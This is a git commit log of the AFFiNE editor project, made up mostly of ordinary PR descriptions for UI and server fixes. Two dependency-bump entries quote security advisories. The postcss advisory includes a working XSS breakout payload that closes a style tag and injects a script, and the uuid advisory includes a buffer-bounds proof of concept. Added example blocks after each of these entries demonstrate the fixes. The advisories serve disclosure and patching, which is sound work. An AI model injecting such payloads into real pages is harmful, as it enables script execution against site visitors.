Resolves #13340. Change align-items to stretch to full width to avoid
tag/label from overlapping with equation.

### Screenshot Verification
**Before**
<img width="661" height="256" alt="Screenshot 2026-04-19 at 5 58 03 PM"
src="https://github.com/user-attachments/assets/a99d0138-838f-4f91-bd63-cbd07710484c"
/>

**After**
<img width="614" height="275" alt="Screenshot 2026-04-19 at 5 58 16 PM"
src="https://github.com/user-attachments/assets/7e62ab09-f290-4b6e-9cd6-d20b8f990da3"
/>

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Style**
* Improved the vertical alignment of LaTeX block content to better
utilize container space.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-05-04 03:54:01 +08:00
Ahsan Khaleeq a1800cf8b2 feat(editor): remove max-height restriction from mermaid preview container (#14882)
This PR fixes #14874 

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

## Release Notes

* **Bug Fixes**
* Removed height limitation on Mermaid diagram previews in code blocks,
allowing larger diagrams to render at their full size without being
constrained by a fixed maximum height.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-05-04 03:46:59 +08:00
DarkSky fa66139230 feat(server): add flag for calendar enable (#14896)
#### PR Dependency Tree


* **PR #14896** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **New Features**
* Added configuration option to manage Google Calendar account linking
access. Administrators can now disable new account connections to
control calendar service integrations. When disabled, the Google
provider is hidden from available options and new linking attempts are
blocked, while existing accounts remain fully functional.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-05-04 03:45:49 +08:00
DarkSky 027d163921 fix(server): add embedding table repair (#14895)
fix #14894


#### PR Dependency Tree


* **PR #14895** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Chores**
* Improved database initialization for self-hosted deployments with
automatic creation and repair of embedding tables and indexes, applied
only when related base tables and extensions are present.
* Updated pre-deploy process to run Prisma migrations, perform
embedding-table maintenance, and execute additional data migrations as
part of setup.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-05-04 03:45:37 +08:00
Abdul Rehman 39abb936b8 fix(core): prevent Alt+Key shortcuts from hijacking macOS Option-key input (#14866)
Fixes #14519

## Summary

On macOS, the Option key combined with a letter produces locale input
characters (e.g. Polish layout: Option+S → `ś`, Option+L → `ł`). The
AFFiNE command registry registers shortcuts like `Alt+KeyS` (used for
Page ↔ Edgeless mode switch) via `tinykeys`, which matches on
`event.code` (the physical key) — so it fires even when the user was
actually typing a non-ASCII character.

Reported in #14519: Polish users cannot type `ś` inside AFFiNE because
Option+S triggers the mode switch instead.

## Fix

In the command registry handler
([registry.ts](packages/frontend/core/src/commands/registry/registry.ts)),
skip the command when Alt is the only modifier **and** the key produced
a non-ASCII character — the user intends to type the character, not
invoke the shortcut.

Matches the existing handling in blocksuite's `keymap.ts` (added for the
same class of issue in #14059).

## Demo



https://github.com/user-attachments/assets/eb6d2e69-39bf-4236-a886-9e2bde425626



## Verified locally (macOS)

- Switched input source to Polish
- Typed `właśnie` in an AFFiNE doc — all characters including `ś`
(Option+S), `ł` (Option+L) now produce the correct output
- Previously Option+S would toggle edgeless mode
- US layout (Option+S → `ß`) and other locale chars (ą, ń, ę) also now
pass through correctly
- Regular Cmd-based shortcuts (Cmd+K, Cmd+S, etc.) unaffected because
the guard excludes `metaKey`

## Test plan

- [x] On macOS, add Polish input source (System Settings → Keyboard →
Input Sources → +)
- [x] Switch to Polish layout
- [x] In any AFFiNE doc, type Option+S → `ś` appears (not mode switch)
- [x] Confirm other shortcuts (Cmd+K, Cmd+Enter, etc.) still work
- [x] Confirm on US layout that Option+S produces `ß` (OS default)
without firing the mode switch

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Bug Fixes**
* Fixed keyboard event handling with Alt key and non-ASCII characters to
prevent unintended command execution.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-05-04 02:35:35 +08:00
Abdul Rehman 9751cab16c fix(editor): native table column resize broken in edgeless mode (#14824)
Fixes #14717

## Summary

When a native `affine:table` block is placed in a note on the edgeless
canvas, dragging the column resize handle (or the column/row drag
handles) causes the canvas to pan instead of triggering the resize/drag,
because the edgeless `DragController` listens at the `pointerdown` level
— earlier than `SelectionController`'s existing `mousedown` handler.

## Fix

Two interception layers added to
`blocksuite/affine/blocks/table/src/selection-controller.ts`, matching
the working pattern in `affine:database`'s `database-header-column.ts`:

1. **DOM-level `pointerdown` `stopPropagation()`** in `dragListener()` —
prevents the edgeless `DragController` from capturing the event before
BlockSuite's event system sees it.
2. **`handleEvent('dragStart', ...)`** in `hostConnected()` — returns
`true` when the target is a resize/drag handle, so the BlockSuite event
dispatcher doesn't route to the edgeless tool controller.

Selectors guarded: `[data-width-adjust-column-id]`,
`[data-drag-column-id]`, `[data-drag-row-id]`.

Mobile and readonly states preserved (matching existing `dragListener()`
guards).

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Bug Fixes**
* Improved drag-and-drop interaction handling for table operations,
including column width adjustment and row/column dragging. Enhanced
event handling to prevent unintended drag actions and ensure proper
behavior.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-05-04 02:34:29 +08:00
congzhou09 5e97e67ecd fix(editor): prevent connector label from breaking after click + move in empty label editor (#14830)
### Problem
●In edgeless mode, after clicking and moving in a connector's label
editor, if the label editor has empty content at the end of the editing,
the label editor for that connector can not be triggered again.

●The following video demonstrates this issue:


https://github.com/user-attachments/assets/8d300720-5ed8-4f9c-90fa-fbf059417ff8

### Root Cause
**Direct cause**
●The `labelOffset` property is **stashed** at drag-start, but is **not
properly popped** afterward. As a result, when
`mountConnectorLabelEditor()` is called the second time
(`packages/affine/gfx/connector/src/text/edgeless-connector-label-editor.ts`),
`connector.labelOffset` returns `undefined` instead of the default value
provided by the `@field` decorator.

**Why moving after clicking incorrectly triggers a drag-start**
●The root issue lies in the interaction between click and drag event
handling. Here's the actual flow:
1. `dispatcher.add('click', () => true)` is registered in
`EdgelessConnectorLabelEditor`.
2. On pointer-down, both `ClickController` and `DragController` receive
the event.
3. On pointer-up, `ClickController` fires a **synthetic click**. The
handler from step 1 returns `true`, triggering
`context.get('defaultState').event.stopPropagation()`.
4. This prevents the native pointer-up from bubbling to `DragController`.
However, a subsequent pointer-move still causes `DragController` to
**incorrectly synthesize a drag-start + drag-move**.

**Fundamental root cause**
●The line `context.get('defaultState').event.stopPropagation()` in
`UIEventDispatcher::run()` stops **both** synthetic and native event
bubbling. It should only stop synthetic event propagation.
●The synthetic event bubbling stopping is already properly handled by
the immediate `return` statement on the next line, because the runners
are prepared in strict order (current → parent → grandparent → ... →
global) by `UIEventDispatcher::_getEventScope()` and then **executed
sequentially** in `UIEventDispatcher::run()`.

### Fix
●Since I cannot rule out that other (current or future) event handlers
may rely on this native event bubbling stopping behavior, I chose not to
remove the `context.get('defaultState').event.stopPropagation()` line
completely. Instead, I added a new constant and now skip
`stopPropagation()` **only** for the following synthetic events:
```ts
const syntheticEventNames = new Set(['click', 'doubleClick', 'tripleClick']);
```
These currently represent all known synthetic click events triggered
from pointer-up.

### After
●The video below shows the behavior after this fix.


https://github.com/user-attachments/assets/65b8a3ce-0767-4d80-986b-8bc6081ddd4c
2026-05-04 02:33:09 +08:00
Adarsh Singh 7046ad7bf4 fix(editor): align selection/handle/remote/text overlays with blocks (#14862)
# Closes #14855.

## The bug

When an `affine:embed-synced-doc` is placed on an edgeless canvas and
resized which sets `model.props.scale` to a value ≠ 1 - the
block-selection frame rendered **inside** that embedded editor is drawn
offset from the actual block boundary. The reporter hit this in Safari,
but the root cause is platform-independent.

![reported
screenshot](https://github.com/user-attachments/assets/ce415528-1d01-4bfe-9d63-1e2884ca2f70)

## Root cause

`affine-embed-edgeless-synced-doc-block` applies `transform:
scale(modelScale)` to its `.affine-embed-synced-doc-container` so the
embedded editor visually fits inside its edgeless xywh
([embed-edgeless-synced-doc-block.ts#L48-L58](https://github.com/toeverything/AFFiNE/blob/canary/blocksuite/affine/blocks/embed-doc/src/embed-synced-doc-block/embed-edgeless-synced-doc-block.ts#L48-L58)).
The inner `Viewport` exposes that outer scale as `viewScale =
boundingClientRect.width / offsetWidth`.

PR #14015 and PR #14074 already taught the surface canvas and
`GfxBlockComponent.getCSSTransform` to compensate by dividing by
`viewScale`. But several selection-related overlays that render inside
the same scaled container were **not** updated in those PRs. They
either:

- read `viewport.toViewCoord(x, y)` - which returns `(x - viewportX) *
zoom * viewScale` and drop the result into CSS `left` / `top` inside the
scaled container, or
- hand-build a `translate(translateX, translateY) scale(zoom)` transform
without `viewScale` compensation.

The outer CSS `scale(viewScale)` then re-applies the scale, leaving the
overlays one factor of `viewScale` away from their blocks. That's
exactly the misalignment in the screenshot - the rect's size looks right
but its position is offset.

## The fix

Mirror the pattern shipped in #14074 everywhere the inner overlays are
placed:

- position: `(model - viewportX) * zoom / viewScale`
- transform scale: `zoom / viewScale`
- translate: `translateX / viewScale, translateY / viewScale`

This keeps the overlays in the same reference frame as
`GfxBlockComponent.getCSSTransform` so they line up with the block
they're framing. When `viewScale === 1` (normal edgeless canvas, outside
any embed) every `/ viewScale` is a no-op and behaviour is unchanged.

## Why this is safe

- When `viewScale === 1` - every existing caller outside
`embed-edgeless-synced-doc` - the math reduces to the original
expression byte-for-byte.
- The fix strictly mirrors the invariant already adopted by
`GfxBlockComponent.getCSSTransform` in #14074. It's the same division by
`viewScale` applied in the same place.
- No public API, type, or DOM structure changed.

## Scope / known limitations

- The `Viewport._cachedBoundingClientRect` cache is only invalidated by
its own `ResizeObserver`
([viewport.ts#L500-L505](https://github.com/toeverything/AFFiNE/blob/canary/blocksuite/framework/std/src/gfx/viewport.ts#L500-L505)).
A CSS-transform change on an ancestor (e.g. the user panning/zooming the
outer edgeless canvas) does not fire it, so in theory `viewScale` can go
stale between outer-viewport updates. In practice this hasn't come up in
repro - the inner viewport's shell is observed and fires whenever layout
shifts. If it turns out to matter I'm happy to add a
`viewport.onResize()` refresh hook off the existing
`GfxViewportInitializer` in a follow-up.
- No integration test added - the existing
`blocksuite/integration-test/edgeless/` suite has no `embed-synced-doc`
harness. Adding one is a larger scope; can follow up if requested.

## Test plan

- [x] `yarn typecheck` - passes
- [x] `yarn lint:ox` - `0 warnings, 0 errors`
- [x] `yarn prettier --write` on the 5 touched files - no changes
- [ ] Manual: on canary, create an edgeless canvas, drop an
embed-synced-doc, resize with `Shift` held so `model.props.scale` ≠ 1,
select any block inside, and verify the blue selection frame sits flush
with the block's boundary (confirm on Safari, Chrome, Firefox).
- [ ] Regression check: on a normal edgeless canvas (no embed), verify
element selection, drag handle, and text/shape inline editors still
render correctly (these code paths hit `viewScale === 1` and should be
unchanged).

## Related PRs

- #14015 - fixed surface canvas at non-1 `viewScale`.
- #14074 - fixed `GfxBlockComponent.getCSSTransform` at non-1
`viewScale`. This PR completes that series by covering the selection
overlays.

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Bug Fixes**
* Fixed positioning and scaling of inline text editors, selection
rectangles, drag handles, and remote cursors so overlays and editors
remain correctly aligned and sized when the viewport uses an additional
outer scale/transform during zooming and panning.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-05-04 01:38:39 +08:00
DarkSky e90e3e537c fix(server): lint 2026-05-04 00:48:23 +08:00
DarkSky d64f368623 feat(server): refactor copilot (#14892)
#### PR Dependency Tree


* **PR #14892** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)
2026-05-04 00:36:47 +08:00
Remi Huigen fa8f1a096c fix(server): allow custom R2 jurisdictional endpoint (#14848)
## Summary
This PR fixes `cloudflare-r2` storage configuration so jurisdictional R2
endpoints (for example EU buckets) work correctly.

Closes #14847

## Problem
`cloudflare-r2` currently ignores `config.endpoint` and always uses:

`https://<accountId>.r2.cloudflarestorage.com`

That breaks uploads for jurisdictional buckets that require endpoints
like:

`https://<accountId>.eu.r2.cloudflarestorage.com`

## Changes
- Updated `R2StorageProvider` endpoint resolution:
  - use `config.endpoint` when provided
- otherwise fall back to `https://${accountId}.r2.cloudflarestorage.com`
- Kept `forcePathStyle: true` behavior unchanged
- Updated validation to require `accountId` **or** `endpoint`
- Improved storage schema descriptions to mention jurisdiction endpoints
- Added focused unit tests for:
  - default account endpoint behavior
  - custom jurisdiction endpoint behavior

## Backward Compatibility
- Existing R2 configs that only provide `accountId` continue to work
exactly as before.
- New behavior only applies when a custom `config.endpoint` is
explicitly set.

## Tests
- Added: `packages/backend/server/src/base/storage/__tests__/r2.spec.ts`
- Verifies both default and custom endpoint selection paths.

_Disclaimer: parts of this PR were implemented with AI assistance._

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Cloudflare R2 config adds an optional "jurisdiction" (EU) option and
consistent endpoint derivation for S3-compatible providers.

* **Documentation**
* Storage configuration schemas clarified: S3 endpoint is
optional/derived from region; R2 endpoint removed from schema and
jurisdiction documented.

* **Tests**
* Added tests validating R2 endpoint selection for default,
EU-jurisdiction, undefined-jurisdiction, and missing-account scenarios.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->

---------

Co-authored-by: DarkSky <25152247+darkskygit@users.noreply.github.com>
2026-05-04 00:22:51 +08:00
DarkSky fb6291cb15 fix: deps dedup 2026-05-03 23:35:57 +08:00
Whitewater 694158eea3 feat(playground): export Y.Doc from debug menu (#14893)
## Summary
- add an Export Y.Doc debug menu item
- encode the active store spaceDoc with Y.encodeStateAsUpdate
- download the update as a binary ydoc-update file

## Test
- yarn workspace @blocksuite/playground build

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **New Features**
* Added Y.Doc export functionality to the debug menu, enabling users to
download the current space document state as a binary update file
through the "Test Operations" → "Export" menu.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-05-03 23:33:41 +08:00
DarkSky 207bd9387e fix(docs): redirect links 2026-04-29 19:56:44 +08:00
DarkSky 78a9942f19 fix: ci 2026-04-29 19:31:40 +08:00
DarkSky 0ccfacbc29 feat(docs): migrate bs docs 2026-04-29 17:23:23 +08:00
renovate[bot] bf6fc66943 chore: bump up postcss version to v8.5.10 [SECURITY] (#14877)
This PR contains the following updates:

| Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [postcss](https://postcss.org/) ([source](https://redirect.github.com/postcss/postcss)) | [`8.5.6` → `8.5.10`](https://renovatebot.com/diffs/npm/postcss/8.5.6/8.5.10) | ![age](https://developer.mend.io/api/mc/badges/age/npm/postcss/8.5.10?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/postcss/8.5.6/8.5.10?slim=true) |

---

### PostCSS has XSS via Unescaped `</style>` in its CSS Stringify Output
[CVE-2026-41305](https://nvd.nist.gov/vuln/detail/CVE-2026-41305) /
[GHSA-qx2v-qp2m-jg93](https://redirect.github.com/advisories/GHSA-qx2v-qp2m-jg93)

<details>
<summary>More information</summary>

#### Details
##### PostCSS: XSS via Unescaped `</style>` in CSS Stringify Output

##### Summary

PostCSS v8.5.5 (latest) does not escape `</style>` sequences when
stringifying CSS ASTs. When user-submitted CSS is parsed and
re-stringified for embedding in HTML `<style>` tags, `</style>` in CSS
values breaks out of the style context, enabling XSS.

##### Proof of Concept

```javascript
const postcss = require('postcss');

// Parse user CSS and re-stringify for page embedding
const userCSS = 'body { content: "</style><script>alert(1)</script><style>"; }';
const ast = postcss.parse(userCSS);
const output = ast.toResult().css;
const html = `<style>${output}</style>`;

console.log(html);
// <style>body { content: "</style><script>alert(1)</script><style>"; }</style>
//
// Browser: </style> closes the style tag, <script> executes
```

**Tested output** (Node.js v22, postcss v8.5.5):
```
Input: body { content: "</style><script>alert(1)</script><style>"; }
Output: body { content: "</style><script>alert(1)</script><style>"; }
Contains </style>: true
```

##### Impact

Impact non-bundler use cases since bundlers for XSS on their own.
Requires some PostCSS plugin to have malware code, which can inject XSS
to website.

##### Suggested Fix

Escape `</style` in all stringified output values:
```javascript
output = output.replace(/<\/(style)/gi, '<\\/$1');
```

##### Credits
Discovered and reported by [Sunil Kumar](https://tharvid.in)
([@TharVid](https://redirect.github.com/TharVid))

#### Severity
- CVSS Score: 6.1 / 10 (Medium)
- Vector String: `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N`

#### References
- [https://github.com/postcss/postcss/security/advisories/GHSA-qx2v-qp2m-jg93](https://redirect.github.com/postcss/postcss/security/advisories/GHSA-qx2v-qp2m-jg93)
- [https://nvd.nist.gov/vuln/detail/CVE-2026-41305](https://nvd.nist.gov/vuln/detail/CVE-2026-41305)
- [https://github.com/postcss/postcss/releases/tag/8.5.10](https://redirect.github.com/postcss/postcss/releases/tag/8.5.10)
- [https://github.com/advisories/GHSA-qx2v-qp2m-jg93](https://redirect.github.com/advisories/GHSA-qx2v-qp2m-jg93)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-qx2v-qp2m-jg93)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### Release Notes

<details>
<summary>postcss/postcss (postcss)</summary>

### [`v8.5.10`](https://redirect.github.com/postcss/postcss/blob/HEAD/CHANGELOG.md#8510)

[Compare Source](https://redirect.github.com/postcss/postcss/compare/8.5.9...8.5.10)

- Fixed XSS via unescaped `</style>` in non-bundler cases (by [@TharVid](https://redirect.github.com/TharVid)).

### [`v8.5.9`](https://redirect.github.com/postcss/postcss/blob/HEAD/CHANGELOG.md#859)

[Compare Source](https://redirect.github.com/postcss/postcss/compare/8.5.8...8.5.9)

- Speed up source map encoding parsing in case of the error.

### [`v8.5.8`](https://redirect.github.com/postcss/postcss/blob/HEAD/CHANGELOG.md#858)

[Compare Source](https://redirect.github.com/postcss/postcss/compare/8.5.7...8.5.8)

- Fixed `Processor#version`.

### [`v8.5.7`](https://redirect.github.com/postcss/postcss/blob/HEAD/CHANGELOG.md#857)

[Compare Source](https://redirect.github.com/postcss/postcss/compare/8.5.6...8.5.7)

- Improved source map annotation cleaning performance (by CodeAnt AI).

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - ""
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).


Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-04-27 11:32:36 +08:00
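
The `</style>` breakout from the postcss advisory in the commit above (CVE-2026-41305), as an added example that is not part of the commit message and is not postcss code: it models how an HTML parser ends a `<style>` element and checks the advisory's suggested escape against that model. The helper names and the second and third sample strings are constructed for illustration; no postcss import is needed.

```javascript
// HTML treats <style> content as raw text: the element ends at the first
// "</style" (any letter case) that is followed by whitespace, "/" or ">".
const STYLE_END = /<\/style(?=[\t\n\f\r \/>])/i;

// Escape taken from the advisory's "Suggested Fix" section. In CSS, "\/" is
// an escaped "/", so a string value is unchanged by the extra backslash.
function escapeStyleClose(css) {
  return css.replace(/<\/(style)/gi, '<\\/$1');
}

// Given CSS placed between <style> and </style>, return the text a browser
// would treat as the stylesheet and whatever it would parse as HTML after it.
function splitAsBrowser(css) {
  const body = css + '</style>';
  const end = STYLE_END.exec(body).index; // always matches the final tag
  const closeTagEnd = body.indexOf('>', end) + 1;
  return {
    styleText: body.slice(0, end),
    trailingHtml: body.slice(closeTagEnd),
  };
}

// Embed untrusted CSS, refusing output that still ends the element early.
function embedCss(css) {
  const safe = escapeStyleClose(css);
  if (splitAsBrowser(safe).trailingHtml !== '') {
    throw new Error('CSS still terminates the <style> element early');
  }
  return `<style>${safe}</style>`;
}

// Compare the raw and escaped forms of one stylesheet.
function report(css) {
  const escaped = escapeStyleClose(css);
  const fixed = splitAsBrowser(escaped);
  return {
    breaksOutRaw: splitAsBrowser(css).trailingHtml !== '',
    breaksOutEscaped: fixed.trailingHtml !== '',
    styleTextIntact: fixed.styleText === escaped,
  };
}

const SAMPLES = [
  // Input string from the advisory's proof of concept.
  'body { content: "</style><script>alert(1)</script><style>"; }',
  // Constructed: mixed case and a space before ">" still close the element.
  'a::after { content: "</STYLE >x"; }',
  // Constructed: "</styles>" is not an end tag; the escape touches it anyway,
  // which is harmless.
  'p { color: red; } /* </styles> */',
];

for (const css of SAMPLES) {
  console.log(report(css), embedCss(css));
}
```
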
renovate[bot] df482c9cf2 chore: bump up uuid version to v14 [SECURITY] (#14870)
This PR contains the following updates:

| Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [uuid](https://redirect.github.com/uuidjs/uuid) | [`^13.0.0` → `^14.0.0`](https://renovatebot.com/diffs/npm/uuid/13.0.0/14.0.0) | ![age](https://developer.mend.io/api/mc/badges/age/npm/uuid/14.0.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/uuid/13.0.0/14.0.0?slim=true) |

---

### uuid: Missing buffer bounds check in v3/v5/v6 when buf is provided

[GHSA-w5hq-g745-h8pq](https://redirect.github.com/advisories/GHSA-w5hq-g745-h8pq)

<details>
<summary>More information</summary>

#### Details
##### Summary

`v3`, `v5`, and `v6` accept external output buffers but do not reject
out-of-range writes (small `buf` or large `offset`).
By contrast, `v4`, `v1`, and `v7` explicitly throw `RangeError` on
invalid bounds.

This inconsistency allows **silent partial writes** into caller-provided
buffers.

##### Affected code

- `src/v35.ts` (`v3`/`v5` path) writes `buf[offset + i]` without bounds
validation.
- `src/v6.ts` writes `buf[offset + i]` without bounds validation.

##### Reproducible PoC

```bash
cd /home/StrawHat/uuid
npm ci
npm run build

node --input-type=module -e "
import {v4,v5,v6} from './dist-node/index.js';
const ns='6ba7b810-9dad-11d1-80b4-00c04fd430c8';
for (const [name,fn] of [
  ['v4',()=>v4({},new Uint8Array(8),4)],
  ['v5',()=>v5('x',ns,new Uint8Array(8),4)],
  ['v6',()=>v6({},new Uint8Array(8),4)],
]) {
  try { fn(); console.log(name,'NO_THROW'); }
  catch(e){ console.log(name,'THREW',e.name); }
}"
```

Observed:

- `v4 THREW RangeError`
- `v5 NO_THROW`
- `v6 NO_THROW`

Example partial overwrite evidence captured during audit:

```text
same true buf [
  170, 170, 170, 170,
   75, 224, 100,  63
]
v6 [
  187, 187, 187, 187,
   31,  19, 185,  64
]
```

##### Security impact

- **Primary**: integrity/robustness issue (silent partial output).
- If an application assumes full UUID writes into preallocated buffers,
this can produce malformed/truncated/partially stale identifiers without
error.
- In systems where caller-controlled offsets/buffer sizes are exposed
indirectly, this may become a security-relevant logic flaw.

##### Suggested fix

Add the same guard used by `v4`/`v1`/`v7`:

```ts
if (offset < 0 || offset + 16 > buf.length) {
  throw new RangeError(`UUID byte range ${offset}:${offset + 15} is out of buffer bounds`);
}
```

Apply to:

- `src/v35.ts` (covers `v3` and `v5`)
- `src/v6.ts`

#### Severity
- CVSS Score: 6.3 / 10 (Medium)
- Vector String:
`CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N`

#### References
- [https://github.com/uuidjs/uuid/security/advisories/GHSA-w5hq-g745-h8pq](https://redirect.github.com/uuidjs/uuid/security/advisories/GHSA-w5hq-g745-h8pq)
- [https://github.com/uuidjs/uuid/commit/3d2c5b0342f0fcb52a5ac681c3d47c13e7444b34](https://redirect.github.com/uuidjs/uuid/commit/3d2c5b0342f0fcb52a5ac681c3d47c13e7444b34)
- [https://github.com/uuidjs/uuid/releases/tag/v14.0.0](https://redirect.github.com/uuidjs/uuid/releases/tag/v14.0.0)
- [https://github.com/advisories/GHSA-w5hq-g745-h8pq](https://redirect.github.com/advisories/GHSA-w5hq-g745-h8pq)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-w5hq-g745-h8pq)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### Release Notes

<details>
<summary>uuidjs/uuid (uuid)</summary>

### [`v14.0.0`](https://redirect.github.com/uuidjs/uuid/blob/HEAD/CHANGELOG.md#1400-2026-04-19)

[Compare Source](https://redirect.github.com/uuidjs/uuid/compare/v13.0.0...v14.0.0)

##### Security

- Fixes [GHSA-w5hq-g745-h8pq](https://redirect.github.com/uuidjs/uuid/security/advisories/GHSA-w5hq-g745-h8pq):
  `v3()`, `v5()`, and `v6()` did not validate that writes would remain
  within the bounds of a caller-supplied buffer, allowing out-of-bounds
  writes when an invalid `offset` was provided. A `RangeError` is now
  thrown if `offset < 0` or `offset + 16 > buf.length`.

##### ⚠ BREAKING CHANGES

- `crypto` is now expected to be globally defined (requires node@20+)
  ([#935](https://redirect.github.com/uuidjs/uuid/issues/935))
- drop node@18 support
  ([#934](https://redirect.github.com/uuidjs/uuid/issues/934))
- upgrade minimum supported TypeScript version to 5.4.3, in keeping with
  the project's policy of supporting TypeScript versions released within
  the last two years

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - ""
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about these
updates again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).


Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-04-26 00:48:53 +08:00
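
The silent partial write from the uuid advisory in the commit above (GHSA-w5hq-g745-h8pq), as an added example that is not part of the commit message and is not uuid's source: it reproduces the unchecked `buf[offset + i]` write pattern on a `Uint8Array` next to the guard quoted in the advisory, without importing the uuid package. The function names, the 16-byte value and the `0xee` stale marker are constructed, and the integer check on `offset` is an extra added here.

```javascript
// Constructed 16-byte value standing in for a generated UUID (0xa0..0xaf).
const UUID_BYTES = Uint8Array.from({ length: 16 }, (_, i) => 0xa0 + i);

// The pattern the advisory describes: index writes with no bounds validation.
// A typed array drops out-of-range index writes without throwing, so the
// caller receives a partial UUID and no error.
function writeUnchecked(bytes, buf, offset = 0) {
  for (let i = 0; i < 16; ++i) buf[offset + i] = bytes[i];
  return buf;
}

// The same write behind the guard quoted in the advisory's suggested fix.
function writeChecked(bytes, buf, offset = 0) {
  // Extra check added in this example (not in the advisory): NaN and
  // fractional offsets pass both comparisons below, so reject them first.
  if (!Number.isInteger(offset) || offset < 0 || offset + 16 > buf.length) {
    throw new RangeError(`UUID byte range ${offset}:${offset + 15} is out of buffer bounds`);
  }
  for (let i = 0; i < 16; ++i) buf[offset + i] = bytes[i];
  return buf;
}

// Count how many of the 16 bytes actually landed in buf at the given offset.
function bytesWritten(bytes, buf, offset) {
  let n = 0;
  for (let i = 0; i < 16; ++i) {
    const at = offset + i;
    if (at >= 0 && at < buf.length && buf[at] === bytes[i]) n++;
  }
  return n;
}

// Run one writer against a fresh buffer pre-filled with 0xee ("stale" data).
function tryWrite(writer, size, offset) {
  const buf = new Uint8Array(size).fill(0xee);
  try {
    writer(UUID_BYTES, buf, offset);
    return { threw: null, written: bytesWritten(UUID_BYTES, buf, offset), buf };
  } catch (e) {
    return { threw: e.name, written: 0, buf };
  }
}

// [buffer size, offset]: the advisory's PoC shape first, then boundary cases.
const CASES = [[8, 4], [16, 0], [32, 16], [32, 17], [32, -1], [32, NaN]];

for (const [size, offset] of CASES) {
  const u = tryWrite(writeUnchecked, size, offset);
  const c = tryWrite(writeChecked, size, offset);
  console.log(
    `size=${size} offset=${offset}`,
    `unchecked: ${u.written}/16 written, threw=${u.threw};`,
    `checked: ${c.written}/16 written, threw=${c.threw}`
  );
}
```
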
Abdul Rehman 2caf3c86f8 fix(editor): prevent popMenu overflow on constrained viewports (#14827)
Fixes #14722

## Summary

`popMenu()` in
`blocksuite/affine/components/src/context-menu/menu-renderer.ts` uses
`autoPlacement` + `offset` in its default middleware, but no `shift()` —
so when `autoPlacement` picks a placement that would overflow the
viewport (e.g. database column menu opening near the top of a short
viewport), the menu stays overflowing and top items get clipped above
the viewport.

## Fix

Add `shift({ padding: 8 })` to the default middleware chain.

This matches the behavior of the sibling helper `createPopup()` in the
same file, which already includes `shift()` in its defaults.

## Reproducing (as reported in #14722)

Viewport ~879×461 (Chrome, macOS). Create a database block near the top
of the viewport → click a column name → menu opens upward and the top
items ("Rename", "Filter") get clipped above the viewport.




## Summary by CodeRabbit

* **Bug Fixes**
  * Enhanced context menu positioning on desktop to provide better
    alignment and spacing adjustments near screen boundaries.

2026-04-21 18:00:33 +08:00
renovate[bot] 557b1e4dfc chore: bump up eslint-plugin-oxlint version to v1.60.0 (#14853)
This PR contains the following updates:

| Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
